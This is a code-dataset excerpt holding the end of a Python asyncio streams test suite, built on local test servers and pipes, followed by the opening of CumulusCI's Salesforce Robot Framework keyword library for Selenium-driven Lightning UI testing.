with self.assertRaisesRegex(RuntimeError, "The stream is write-only"):
await stream.readuntil()
with self.assertRaisesRegex(RuntimeError, "The stream is write-only"):
await stream.read()
with self.assertRaisesRegex(RuntimeError, "The stream is write-only"):
await stream.readexactly(10)
with self.assertRaisesRegex(RuntimeError, "The stream is write-only"):
async for chunk in stream:
pass
self.loop.run_until_complete(inner())
def _basetest_connect(self, stream):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
stream.write(b'GET / HTTP/1.0\r\n\r\n')
f = stream.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
f = stream.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
stream.close()
self.loop.run_until_complete(stream.wait_closed())
self.assertEqual([], messages)
def test_connect(self):
with test_utils.run_test_server() as httpd:
stream = self.loop.run_until_complete(
asyncio.connect(*httpd.address))
self.assertFalse(stream.is_server_side())
self._basetest_connect(stream)
@support.skip_unless_bind_unix_socket
def test_connect_unix(self):
with test_utils.run_test_unix_server() as httpd:
stream = self.loop.run_until_complete(
asyncio.connect_unix(httpd.address))
self._basetest_connect(stream)
def test_stream_async_context_manager(self):
async def test(httpd):
stream = await asyncio.connect(*httpd.address)
async with stream:
await stream.write(b'GET / HTTP/1.0\r\n\r\n')
data = await stream.readline()
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
data = await stream.read()
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
self.assertTrue(stream.is_closing())
with test_utils.run_test_server() as httpd:
self.loop.run_until_complete(test(httpd))
def test_connect_async_context_manager(self):
async def test(httpd):
async with asyncio.connect(*httpd.address) as stream:
await stream.write(b'GET / HTTP/1.0\r\n\r\n')
data = await stream.readline()
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
data = await stream.read()
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
self.assertTrue(stream.is_closing())
with test_utils.run_test_server() as httpd:
self.loop.run_until_complete(test(httpd))
@support.skip_unless_bind_unix_socket
def test_connect_unix_async_context_manager(self):
async def test(httpd):
async with asyncio.connect_unix(httpd.address) as stream:
await stream.write(b'GET / HTTP/1.0\r\n\r\n')
data = await stream.readline()
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
data = await stream.read()
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
self.assertTrue(stream.is_closing())
with test_utils.run_test_unix_server() as httpd:
self.loop.run_until_complete(test(httpd))
def test_stream_server(self):
async def handle_client(stream):
self.assertTrue(stream.is_server_side())
data = await stream.readline()
await stream.write(data)
await stream.close()
async def client(srv):
addr = srv.sockets[0].getsockname()
stream = await asyncio.connect(*addr)
# send a line
await stream.write(b"hello world!\n")
# read it back
msgback = await stream.readline()
await stream.close()
self.assertEqual(msgback, b"hello world!\n")
await srv.close()
async def test():
async with asyncio.StreamServer(handle_client, '127.0.0.1', 0) as server:
await server.start_serving()
task = asyncio.create_task(client(server))
with contextlib.suppress(asyncio.CancelledError):
await server.serve_forever()
await task
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(test())
self.assertEqual(messages, [])
@support.skip_unless_bind_unix_socket
def test_unix_stream_server(self):
async def handle_client(stream):
data = await stream.readline()
await stream.write(data)
await stream.close()
async def client(srv):
addr = srv.sockets[0].getsockname()
stream = await asyncio.connect_unix(addr)
# send a line
await stream.write(b"hello world!\n")
# read it back
msgback = await stream.readline()
await stream.close()
self.assertEqual(msgback, b"hello world!\n")
await srv.close()
async def test():
with test_utils.unix_socket_path() as path:
async with asyncio.UnixStreamServer(handle_client, path) as server:
await server.start_serving()
task = asyncio.create_task(client(server))
with contextlib.suppress(asyncio.CancelledError):
await server.serve_forever()
await task
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(test())
self.assertEqual(messages, [])
def test_stream_server_inheritance_forbidden(self):
with self.assertRaises(TypeError):
class MyServer(asyncio.StreamServer):
pass
@support.skip_unless_bind_unix_socket
def test_unix_stream_server_inheritance_forbidden(self):
with self.assertRaises(TypeError):
class MyServer(asyncio.UnixStreamServer):
pass
def test_stream_server_bind(self):
async def handle_client(stream):
await stream.close()
async def test():
srv = asyncio.StreamServer(handle_client, '127.0.0.1', 0)
self.assertFalse(srv.is_bound())
self.assertEqual(0, len(srv.sockets))
await srv.bind()
self.assertTrue(srv.is_bound())
self.assertEqual(1, len(srv.sockets))
await srv.close()
self.assertFalse(srv.is_bound())
self.assertEqual(0, len(srv.sockets))
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(test())
self.assertEqual(messages, [])
def test_stream_server_bind_async_with(self):
async def handle_client(stream):
await stream.close()
async def test():
async with asyncio.StreamServer(handle_client, '127.0.0.1', 0) as srv:
self.assertTrue(srv.is_bound())
self.assertEqual(1, len(srv.sockets))
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(test())
self.assertEqual(messages, [])
def test_stream_server_start_serving(self):
async def handle_client(stream):
await stream.close()
async def test():
async with asyncio.StreamServer(handle_client, '127.0.0.1', 0) as srv:
self.assertFalse(srv.is_serving())
await srv.start_serving()
self.assertTrue(srv.is_serving())
await srv.close()
self.assertFalse(srv.is_serving())
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(test())
self.assertEqual(messages, [])
def test_stream_server_close(self):
server_stream_aborted = False
fut1 = self.loop.create_future()
fut2 = self.loop.create_future()
async def handle_client(stream):
data = await stream.readexactly(4)
self.assertEqual(b'data', data)
fut1.set_result(None)
await fut2
self.assertEqual(b'', await stream.readline())
nonlocal server_stream_aborted
server_stream_aborted = True
async def client(srv):
addr = srv.sockets[0].getsockname()
stream = await asyncio.connect(*addr)
await stream.write(b'data')
await fut2
self.assertEqual(b'', await stream.readline())
await stream.close()
async def test():
async with asyncio.StreamServer(handle_client, '127.0.0.1', 0) as server:
await server.start_serving()
task = asyncio.create_task(client(server))
await fut1
fut2.set_result(None)
await server.close()
await task
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(asyncio.wait_for(test(), 60.0))
self.assertEqual(messages, [])
self.assertTrue(fut1.done())
self.assertTrue(fut2.done())
self.assertTrue(server_stream_aborted)
def test_stream_server_abort(self):
server_stream_aborted = False
fut1 = self.loop.create_future()
fut2 = self.loop.create_future()
async def handle_client(stream):
data = await stream.readexactly(4)
self.assertEqual(b'data', data)
fut1.set_result(None)
await fut2
self.assertEqual(b'', await stream.readline())
nonlocal server_stream_aborted
server_stream_aborted = True
async def client(srv):
addr = srv.sockets[0].getsockname()
stream = await asyncio.connect(*addr)
await stream.write(b'data')
await fut2
self.assertEqual(b'', await stream.readline())
await stream.close()
async def test():
async with asyncio.StreamServer(handle_client, '127.0.0.1', 0) as server:
await server.start_serving()
task = asyncio.create_task(client(server))
await fut1
fut2.set_result(None)
await server.abort()
await task
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(asyncio.wait_for(test(), 60.0))
self.assertEqual(messages, [])
self.assertTrue(fut1.done())
self.assertTrue(fut2.done())
self.assertTrue(server_stream_aborted)
def test_stream_shutdown_hung_task(self):
fut1 = self.loop.create_future()
fut2 = self.loop.create_future()
cancelled = self.loop.create_future()
async def handle_client(stream):
data = await stream.readexactly(4)
self.assertEqual(b'data', data)
fut1.set_result(None)
await fut2
try:
while True:
await asyncio.sleep(0.01)
except asyncio.CancelledError:
cancelled.set_result(None)
raise
async def client(srv):
addr = srv.sockets[0].getsockname()
stream = await asyncio.connect(*addr)
await stream.write(b'data')
await fut2
self.assertEqual(b'', await stream.readline())
await stream.close()
async def test():
async with asyncio.StreamServer(handle_client,
'127.0.0.1',
0,
shutdown_timeout=0.3) as server:
await server.start_serving()
task = asyncio.create_task(client(server))
await fut1
fut2.set_result(None)
await server.close()
await task
await cancelled
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(asyncio.wait_for(test(), 60.0))
self.assertEqual(messages, [])
self.assertTrue(fut1.done())
self.assertTrue(fut2.done())
self.assertTrue(cancelled.done())
def test_stream_shutdown_hung_task_prevents_cancellation(self):
fut1 = self.loop.create_future()
fut2 = self.loop.create_future()
cancelled = self.loop.create_future()
do_handle_client = True
async def handle_client(stream):
data = await stream.readexactly(4)
self.assertEqual(b'data', data)
fut1.set_result(None)
await fut2
while do_handle_client:
with contextlib.suppress(asyncio.CancelledError):
await asyncio.sleep(0.01)
cancelled.set_result(None)
async def client(srv):
addr = srv.sockets[0].getsockname()
stream = await asyncio.connect(*addr)
await stream.write(b'data')
await fut2
self.assertEqual(b'', await stream.readline())
await stream.close()
async def test():
async with asyncio.StreamServer(handle_client,
'127.0.0.1',
0,
shutdown_timeout=0.3) as server:
await server.start_serving()
task = asyncio.create_task(client(server))
await fut1
fut2.set_result(None)
await server.close()
nonlocal do_handle_client
do_handle_client = False
await task
await cancelled
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(asyncio.wait_for(test(), 60.0))
self.assertEqual(1, len(messages))
self.assertRegex(messages[0]['message'],
"<Task pending .+ ignored cancellation request")
self.assertTrue(fut1.done())
self.assertTrue(fut2.done())
self.assertTrue(cancelled.done())
def test_sendfile(self):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with open(support.TESTFN, 'wb') as fp:
fp.write(b'data\n')
self.addCleanup(support.unlink, support.TESTFN)
async def serve_callback(stream):
data = await stream.readline()
await stream.write(b'ack-' + data)
data = await stream.readline()
await stream.write(b'ack-' + data)
data = await stream.readline()
await stream.write(b'ack-' + data)
await stream.close()
async def do_connect(host, port):
stream = await asyncio.connect(host, port)
await stream.write(b'begin\n')
data = await stream.readline()
self.assertEqual(b'ack-begin\n', data)
with open(support.TESTFN, 'rb') as fp:
await stream.sendfile(fp)
data = await stream.readline()
self.assertEqual(b'ack-data\n', data)
await stream.write(b'end\n')
data = await stream.readline()
self.assertEqual(data, b'ack-end\n')
await stream.close()
async def test():
async with asyncio.StreamServer(serve_callback, '127.0.0.1', 0) as srv:
await srv.start_serving()
await do_connect(*srv.sockets[0].getsockname())
self.loop.run_until_complete(test())
self.assertEqual([], messages)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_connect_start_tls(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
# connect without SSL but upgrade to TLS just after
# connection is established
stream = self.loop.run_until_complete(
asyncio.connect(*httpd.address))
self.loop.run_until_complete(
stream.start_tls(
sslcontext=test_utils.dummy_ssl_context()))
self._basetest_connect(stream)
def test_repr_unbound(self):
async def serve(stream):
pass
async def test():
srv = asyncio.StreamServer(serve)
self.assertEqual('<StreamServer>', repr(srv))
await srv.close()
self.loop.run_until_complete(test())
def test_repr_bound(self):
async def serve(stream):
pass
async def test():
srv = asyncio.StreamServer(serve, '127.0.0.1', 0)
await srv.bind()
self.assertRegex(repr(srv), r'<StreamServer sockets=\(.+\)>')
await srv.close()
self.loop.run_until_complete(test())
def test_repr_serving(self):
async def serve(stream):
pass
async def test():
srv = asyncio.StreamServer(serve, '127.0.0.1', 0)
await srv.start_serving()
self.assertRegex(repr(srv), r'<StreamServer serving sockets=\(.+\)>')
await srv.close()
self.loop.run_until_complete(test())
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pipe(self):
async def test():
rpipe, wpipe = os.pipe()
pipeobj = io.open(rpipe, 'rb', 1024)
async with asyncio.connect_read_pipe(pipeobj) as stream:
self.assertEqual(stream.mode, asyncio.StreamMode.READ)
os.write(wpipe, b'1')
data = await stream.readexactly(1)
self.assertEqual(data, b'1')
os.write(wpipe, b'2345')
data = await stream.readexactly(4)
self.assertEqual(data, b'2345')
os.close(wpipe)
self.loop.run_until_complete(test())
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe(self):
async def test():
rpipe, wpipe = os.pipe()
pipeobj = io.open(wpipe, 'wb', 1024)
async with asyncio.connect_write_pipe(pipeobj) as stream:
self.assertEqual(stream.mode, asyncio.StreamMode.WRITE)
await stream.write(b'1')
data = os.read(rpipe, 1024)
self.assertEqual(data, b'1')
await stream.write(b'2345')
data = os.read(rpipe, 1024)
self.assertEqual(data, b'2345')
os.close(rpipe)
self.loop.run_until_complete(test())
def test_stream_ctor_forbidden(self):
with self.assertRaisesRegex(RuntimeError,
"should be instantiated "
"by asyncio internals only"):
asyncio.Stream(asyncio.StreamMode.READWRITE)
if __name__ == '__main__':
unittest.main()
avg_line_length: 39.007259 | max_line_length: 85 | alphanum_fraction: 0.582062

hexsha: f722240a67244d196847090cdf5dd01aa951f23d | size: 61618 | ext: py | lang: Python
max_stars_repo_path: cumulusci/robotframework/Salesforce.py | max_stars_repo_name: leboff/CumulusCI | max_stars_repo_head_hexsha: 81edbb1d64f2cc215a951c570052a1e423821cc1 | max_stars_repo_licenses: ["BSD-3-Clause"] | max_stars_count: null | max_stars_repo_stars_event_min_datetime: null | max_stars_repo_stars_event_max_datetime: null
max_issues_repo_path: cumulusci/robotframework/Salesforce.py | max_issues_repo_name: leboff/CumulusCI | max_issues_repo_head_hexsha: 81edbb1d64f2cc215a951c570052a1e423821cc1 | max_issues_repo_licenses: ["BSD-3-Clause"] | max_issues_count: null | max_issues_repo_issues_event_min_datetime: null | max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: cumulusci/robotframework/Salesforce.py | max_forks_repo_name: leboff/CumulusCI | max_forks_repo_head_hexsha: 81edbb1d64f2cc215a951c570052a1e423821cc1 | max_forks_repo_licenses: ["BSD-3-Clause"] | max_forks_count: null | max_forks_repo_forks_event_min_datetime: null | max_forks_repo_forks_event_max_datetime: null
import importlib
import logging
import re
import time
from datetime import datetime
from dateutil.parser import parse as parse_date, ParserError
from pprint import pformat
from robot.libraries.BuiltIn import BuiltIn, RobotNotRunningError
from robot.utils import timestr_to_secs
from cumulusci.robotframework.utils import get_locator_module_name
from cumulusci.robotframework.form_handlers import get_form_handler
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.action_chains import ActionChains
from selenium.common.exceptions import (
StaleElementReferenceException,
NoSuchElementException,
JavascriptException,
WebDriverException,
)
import faker
from simple_salesforce import SalesforceResourceNotFound
from cumulusci.robotframework.utils import selenium_retry, capture_screenshot_on_error
from SeleniumLibrary.errors import ElementNotFound, NoOpenBrowser
from urllib3.exceptions import ProtocolError
from cumulusci.core.template_utils import format_str
from cumulusci.robotframework import locator_manager
OID_REGEX = r"^(%2F)?([a-zA-Z0-9]{15,18})$"
STATUS_KEY = ("status",)
lex_locators = {} # will be initialized when Salesforce is instantiated
# https://developer.salesforce.com/docs/atlas.en-us.api_rest.meta/api_rest/resources_composite_sobjects_collections_create.htm
SF_COLLECTION_INSERTION_LIMIT = 200
@selenium_retry
class Salesforce(object):
"""A keyword library for working with Salesforce Lightning pages
While you can import this directly into any suite, the recommended way
to include this in a test suite is to import the ``Salesforce.robot``
resource file.
"""
ROBOT_LIBRARY_SCOPE = "GLOBAL"
def __init__(self, debug=False, locators=None):
self.debug = debug
self._session_records = []
# Turn off info logging of all http requests
logging.getLogger("requests.packages.urllib3.connectionpool").setLevel(
logging.WARN
)
if locators:
lex_locators.update(locators)
else:
self._init_locators()
self._faker = faker.Faker("en_US")
try:
self.builtin.set_global_variable("${faker}", self._faker)
except RobotNotRunningError:
# this only happens during unit tests, and we don't care.
pass
def _init_locators(self):
"""Load the appropriate locator file for the current version
If no version can be determined, we'll use the highest numbered
locator file name.
"""
try:
version = int(float(self.get_latest_api_version()))
except RobotNotRunningError:
# Likely this means we are running in the context of
# documentation generation. Setting the version to
# None will result in using the latest version of
# locators.
version = None
locator_module_name = get_locator_module_name(version)
self.locators_module = importlib.import_module(locator_module_name)
lex_locators.update(self.locators_module.lex_locators)
@property
def builtin(self):
return BuiltIn()
@property
def cumulusci(self):
return self.builtin.get_library_instance("cumulusci.robotframework.CumulusCI")
def initialize_location_strategies(self):
"""Initialize the Salesforce custom location strategies
Note: This keyword is called automatically from *Open Test Browser*
"""
if not self.builtin.get_variable_value(
"${LOCATION STRATEGIES INITIALIZED}", False
):
# this manages strategies based on locators in a dictionary
locator_manager.register_locators("sf", lex_locators)
locator_manager.add_location_strategies()
# these are more traditional location strategies based on keywords
# or functions
self.selenium.add_location_strategy(
"text", "Salesforce.Locate Element by Text"
)
self.selenium.add_location_strategy(
"title", "Salesforce.Locate Element by Title"
)
self.selenium.add_location_strategy("label", self.locate_element_by_label)
self.builtin.set_suite_variable("${LOCATION STRATEGIES INITIALIZED}", True)
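    # Illustrative usage sketch (added comment, not part of the original
    # library): once the strategies above are registered, SeleniumLibrary
    # keywords accept "sf:", "text:", "title:" and "label:" prefixed locators.
    # The concrete locator values below are assumptions for illustration only:
    #
    #   self.selenium.wait_until_page_contains_element("sf:app_launcher.button")
    #   self.selenium.click_element("text:Save")
    #   self.selenium.get_webelement("label:First Name")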
@selenium_retry(False)
def _jsclick(self, locator):
"""Use javascript to click an element on the page
See https://help.salesforce.com/articleView?id=000352057&language=en_US&mode=1&type=1
"""
self.selenium.wait_until_page_contains_element(locator)
self.selenium.wait_until_element_is_enabled(locator)
for should_retry in (True, False):
try:
# Setting the focus first seems to be required as of Spring'20
# (read: without it, tests started failing in that release). I
# suspect it's because there is a focusOut handler on form
# fields which need to be triggered for data to be accepted.
element = self.selenium.get_webelement(locator)
self.selenium.driver.execute_script(
"arguments[0].focus(); arguments[0].click()", element
)
return
except StaleElementReferenceException:
if should_retry:
time.sleep(1)
else:
raise
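    # Minimal sketch (assumption, for illustration only): the script executed
    # by _jsclick is roughly what the following plain-Selenium calls would do,
    # with the explicit focus() working around Lightning components that only
    # commit data on a focus/focusOut cycle. The XPath below is hypothetical:
    #
    #   element = self.selenium.driver.find_element_by_xpath("//button[@name='SaveEdit']")
    #   self.selenium.driver.execute_script(
    #       "arguments[0].focus(); arguments[0].click()", element)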
def set_faker_locale(self, locale):
"""Set the locale for fake data
This sets the locale for all calls to the ``Faker`` keyword
and ``${faker}`` variable. The default is en_US
For a list of supported locales see
[https://faker.readthedocs.io/en/master/locales.html|Localized Providers]
in the Faker documentation.
Example
| Set Faker Locale fr_FR
| ${french_address}= Faker address
"""
try:
self._faker = faker.Faker(locale)
except AttributeError:
raise Exception(f"Unknown locale for fake data: '{locale}'")
def get_fake_data(self, fake, *args, **kwargs):
"""Return fake data
This uses the [https://faker.readthedocs.io/en/master/|Faker]
library to provide fake data in a variety of formats (names,
addresses, credit card numbers, dates, phone numbers, etc) and
locales (en_US, fr_FR, etc).
The _fake_ argument is the name of a faker property such as
``first_name``, ``address``, ``lorem``, etc. Additional
arguments depend on type of data requested. For a
comprehensive list of the types of fake data that can be
generated see
[https://faker.readthedocs.io/en/master/providers.html|Faker
providers] in the Faker documentation.
The return value is typically a string, though in some cases
some other type of object will be returned. For example, the
``date_between`` fake returns a
[https://docs.python.org/3/library/datetime.html#date-objects|datetime.date
object]. Each time a piece of fake data is requested it will
be regenerated, so that multiple calls will usually return
different data.
This keyword can also be called using robot's extended variable
syntax using the variable ``${faker}``. In such a case, the
data being asked for is a method call and arguments must be
enclosed in parentheses and be quoted. Arguments should not be
quoted when using the keyword.
To generate fake data for a locale other than en_US, use
the keyword ``Set Faker Locale`` prior to calling this keyword.
Examples
| # Generate a fake first name
| ${first_name}= Get fake data first_name
| # Generate a fake date in the default format
| ${date}= Get fake data date
| # Generate a fake date with an explicit format
| ${date}= Get fake data date pattern=%Y-%m-%d
| # Generate a fake date using extended variable syntax
| Input text //input ${faker.date(pattern='%Y-%m-%d')}
"""
try:
return self._faker.format(fake, *args, **kwargs)
except AttributeError:
raise Exception(f"Unknown fake data request: '{fake}'")
def get_latest_api_version(self):
return self.cumulusci.org.latest_api_version
def create_webdriver_with_retry(self, *args, **kwargs):
"""Call the Create Webdriver keyword.
Retry on connection resets which can happen if custom domain propagation is slow.
"""
# Get selenium without referencing selenium.driver which doesn't exist yet
selenium = self.builtin.get_library_instance("SeleniumLibrary")
for _ in range(12):
try:
return selenium.create_webdriver(*args, **kwargs)
except ProtocolError:
# Give browser some more time to start up
time.sleep(5)
raise Exception("Could not connect to remote webdriver after 1 minute")
@capture_screenshot_on_error
def click_modal_button(self, title):
"""Clicks a button in a Lightning modal."""
locator = lex_locators["modal"]["button"].format(title)
self.selenium.wait_until_page_contains_element(locator)
self.selenium.wait_until_element_is_enabled(locator)
self._jsclick(locator)
@capture_screenshot_on_error
def click_object_button(self, title):
"""Clicks a button in an object's actions."""
locator = lex_locators["object"]["button"].format(title=title)
self._jsclick(locator)
self.wait_until_modal_is_open()
@capture_screenshot_on_error
def scroll_element_into_view(self, locator):
"""Scroll the element identified by 'locator'
This is a replacement for the keyword of the same name in
SeleniumLibrary. The SeleniumLibrary implementation uses
an unreliable method on Firefox. This keyword uses
a more reliable technique.
For more info see https://stackoverflow.com/a/52045231/7432
"""
element = self.selenium.get_webelement(locator)
self.selenium.driver.execute_script("arguments[0].scrollIntoView()", element)
@capture_screenshot_on_error
def load_related_list(self, heading, tries=10):
"""Scrolls down until the specified related list loads.
If the related list isn't found, the keyword will scroll down
in 100 pixel increments to trigger lightning into loading the
list. This process of scrolling will be repeated until the
related list has been loaded or we've tried several times
(the default is 10 tries)
"""
locator = lex_locators["record"]["related"]["card"].format(heading)
for i in range(tries):
try:
self.selenium.scroll_element_into_view(locator)
return
except (ElementNotFound, JavascriptException, WebDriverException):
self.builtin.log(
f"related list '{heading}' not found; scrolling...", "DEBUG"
)
self.selenium.execute_javascript("window.scrollBy(0, 100)")
self.wait_for_aura()
raise AssertionError(f"Timed out waiting for related list '{heading}' to load.")
def click_related_list_button(self, heading, button_title):
"""Clicks a button in the heading of a related list.
Waits for a modal to open after clicking the button.
"""
self.load_related_list(heading)
locator = lex_locators["record"]["related"]["button"].format(
heading, button_title
)
self._jsclick(locator)
self.wait_until_modal_is_open()
@capture_screenshot_on_error
def click_related_item_link(self, heading, title):
"""Clicks a link in the related list with the specified heading.
This keyword will automatically call *Wait until loading is complete*.
"""
self.load_related_list(heading)
locator = lex_locators["record"]["related"]["link"].format(heading, title)
try:
self._jsclick(locator)
except Exception as e:
self.builtin.log(f"Exception: {e}", "DEBUG")
raise Exception(
f"Unable to find related link under heading '{heading}' with the text '{title}'"
)
self.wait_until_loading_is_complete()
def click_related_item_popup_link(self, heading, title, link):
"""Clicks a link in the popup menu for a related list item.
heading specifies the name of the list,
title specifies the name of the item,
and link specifies the name of the link
"""
self.load_related_list(heading)
locator = lex_locators["record"]["related"]["popup_trigger"].format(
heading, title
)
self.selenium.wait_until_page_contains_element(locator)
self._jsclick(locator)
locator = lex_locators["popup"]["link"].format(link)
self._jsclick(locator)
self.wait_until_loading_is_complete()
def close_modal(self):
"""Closes the open modal"""
locator = lex_locators["modal"]["close"]
self._jsclick(locator)
def current_app_should_be(self, app_name):
"""Validates the currently selected Salesforce App"""
locator = lex_locators["app_launcher"]["current_app"].format(app_name)
elem = self.selenium.get_webelement(locator)
assert app_name == elem.text, "Expected app to be {} but found {}".format(
app_name, elem.text
)
def delete_session_records(self):
"""Deletes records that were created while running this test case.
(Only records specifically recorded using the Store Session Record
keyword are deleted.)
"""
self._session_records.reverse()
self.builtin.log("Deleting {} records".format(len(self._session_records)))
for record in self._session_records[:]:
self.builtin.log(" Deleting {type} {id}".format(**record))
try:
self.salesforce_delete(record["type"], record["id"])
except SalesforceResourceNotFound:
self.builtin.log(" {type} {id} is already deleted".format(**record))
except Exception as e:
self.builtin.log(
" {type} {id} could not be deleted:".format(**record),
level="WARN",
)
self.builtin.log(" {}".format(e), level="WARN")
def get_active_browser_ids(self):
"""Return the id of all open browser ids"""
# This relies on some private data structures, but presently
# there is no other way. There's been a discussion in the
# robot slack channels about adding a new keyword that does
# what this keyword does. When that happens, we can remove
# this keyword.
driver_ids = []
try:
driver_cache = self.selenium._drivers
except NoOpenBrowser:
return []
for index, driver in enumerate(driver_cache._connections):
if driver not in driver_cache._closed:
# SeleniumLibrary driver ids start at one rather than zero
driver_ids.append(index + 1)
return driver_ids
def get_current_record_id(self):
"""Parses the current url to get the object id of the current record.
Expects url format like: [a-zA-Z0-9]{15,18}
"""
url = self.selenium.get_location()
for part in url.split("/"):
oid_match = re.match(OID_REGEX, part)
if oid_match is not None:
return oid_match.group(2)
raise AssertionError("Could not parse record id from url: {}".format(url))
def field_value_should_be(self, label, expected_value):
"""Verify that the form field for the given label is the expected value
Example:
| Field value should be Account Name ACME Labs
"""
value = self.get_field_value(label)
self.builtin.should_be_equal(value, expected_value)
def get_field_value(self, label):
"""Return the current value of a form field based on the field label"""
api_version = int(float(self.get_latest_api_version()))
locator = self._get_input_field_locator(label)
if api_version >= 51:
# this works for both First Name (input) and Account Name (picklist)
value = self.selenium.get_value(locator)
else:
# older releases it's a bit more complex
element = self.selenium.get_webelement(locator)
if element.get_attribute("role") == "combobox":
value = self.selenium.get_text(f"sf:object.field_lookup_value:{label}")
else:
value = self.selenium.get_value(f"sf:object.field:{label}")
return value
def get_locator(self, path, *args, **kwargs):
"""Returns a rendered locator string from the Salesforce lex_locators
dictionary. This can be useful if you want to use an element in
a different way than the built in keywords allow.
"""
locator = lex_locators
for key in path.split("."):
locator = locator[key]
return locator.format(*args, **kwargs)
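    # Hedged usage sketch (added comment; the argument values are hypothetical):
    # get_locator walks the nested lex_locators dictionary by the dotted path
    # and then formats the template it finds, e.g.:
    #
    #   locator = self.get_locator("record.related.button", "Contacts", "New")
    #   self.selenium.wait_until_page_contains_element(locator)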
def get_record_type_id(self, obj_type, developer_name):
"""Returns the Record Type Id for a record type name"""
soql = "SELECT Id FROM RecordType WHERE SObjectType='{}' and DeveloperName='{}'".format(
obj_type, developer_name
)
res = self.cumulusci.sf.query_all(soql)
return res["records"][0]["Id"]
def get_related_list_count(self, heading):
"""Returns the number of items indicated for a related list."""
locator = lex_locators["record"]["related"]["count"].format(heading)
count = self.selenium.get_webelement(locator).text
count = count.replace("(", "").replace(")", "")
return int(count)
def go_to_object_home(self, obj_name):
"""Navigates to the Home view of a Salesforce Object"""
url = self.cumulusci.org.lightning_base_url
url = "{}/lightning/o/{}/home".format(url, obj_name)
self.selenium.go_to(url)
self.wait_until_loading_is_complete(lex_locators["actions"])
def go_to_object_list(self, obj_name, filter_name=None):
"""Navigates to the Home view of a Salesforce Object"""
url = self.cumulusci.org.lightning_base_url
url = "{}/lightning/o/{}/list".format(url, obj_name)
if filter_name:
url += "?filterName={}".format(filter_name)
self.selenium.go_to(url)
self.wait_until_loading_is_complete(lex_locators["actions"])
def go_to_record_home(self, obj_id):
"""Navigates to the Home view of a Salesforce Object"""
url = self.cumulusci.org.lightning_base_url
url = "{}/lightning/r/{}/view".format(url, obj_id)
self.selenium.go_to(url)
self.wait_until_loading_is_complete(lex_locators["actions"])
def go_to_setup_home(self):
"""Navigates to the Home tab of Salesforce Setup"""
url = self.cumulusci.org.lightning_base_url
self.selenium.go_to(url + "/lightning/setup/SetupOneHome/home")
self.wait_until_loading_is_complete()
def go_to_setup_object_manager(self):
"""Navigates to the Object Manager tab of Salesforce Setup"""
url = self.cumulusci.org.lightning_base_url
self.selenium.go_to(url + "/lightning/setup/ObjectManager/home")
self.wait_until_loading_is_complete()
def header_field_should_have_value(self, label):
"""Validates that a field in the record header has a text value.
NOTE: Use other keywords for non-string value types
"""
locator = lex_locators["record"]["header"]["field_value"].format(label)
self.selenium.page_should_contain_element(locator)
def header_field_should_not_have_value(self, label):
"""Validates that a field in the record header does not have a value.
NOTE: Use other keywords for non-string value types
"""
locator = lex_locators["record"]["header"]["field_value"].format(label)
self.selenium.page_should_not_contain_element(locator)
def header_field_should_have_link(self, label):
"""Validates that a field in the record header has a link as its value"""
locator = lex_locators["record"]["header"]["field_value_link"].format(label)
self.selenium.page_should_contain_element(locator)
def header_field_should_not_have_link(self, label):
"""Validates that a field in the record header does not have a link as its value"""
locator = lex_locators["record"]["header"]["field_value_link"].format(label)
self.selenium.page_should_not_contain_element(locator)
def click_header_field_link(self, label):
"""Clicks a link in record header."""
locator = lex_locators["record"]["header"]["field_value_link"].format(label)
self._jsclick(locator)
def header_field_should_be_checked(self, label):
"""Validates that a checkbox field in the record header is checked"""
locator = lex_locators["record"]["header"]["field_value_checked"].format(label)
self.selenium.page_should_contain_element(locator)
def header_field_should_be_unchecked(self, label):
"""Validates that a checkbox field in the record header is unchecked"""
locator = lex_locators["record"]["header"]["field_value_unchecked"].format(
label
)
self.selenium.page_should_contain_element(locator)
def log_browser_capabilities(self, loglevel="INFO"):
"""Logs all of the browser capabilities as reported by selenium"""
output = "selenium browser capabilities:\n"
output += pformat(self.selenium.driver.capabilities, indent=4)
self.builtin.log(output, level=loglevel)
@capture_screenshot_on_error
def open_app_launcher(self, retry=True):
"""Opens the Saleforce App Launcher Modal
Note: starting with Spring '20 the app launcher button opens a
menu rather than a modal. To maintain backwards compatibility,
this keyword will continue to open the modal rather than the
menu. If you need to interact with the app launcher menu, you
will need to create a custom keyword.
If the retry parameter is true, the keyword will
close and then re-open the app launcher if it times out
while waiting for the dialog to open.
"""
self._jsclick("sf:app_launcher.button")
self.selenium.wait_until_element_is_visible("sf:app_launcher.view_all")
self._jsclick("sf:app_launcher.view_all")
self.wait_until_modal_is_open()
try:
# the modal may be open, but not yet fully rendered
# wait until at least one link appears. We've seen that sometimes
# the dialog hangs prior to any links showing up
self.selenium.wait_until_element_is_visible(
"xpath://ul[contains(@class, 'al-modal-list')]//li"
)
except Exception as e:
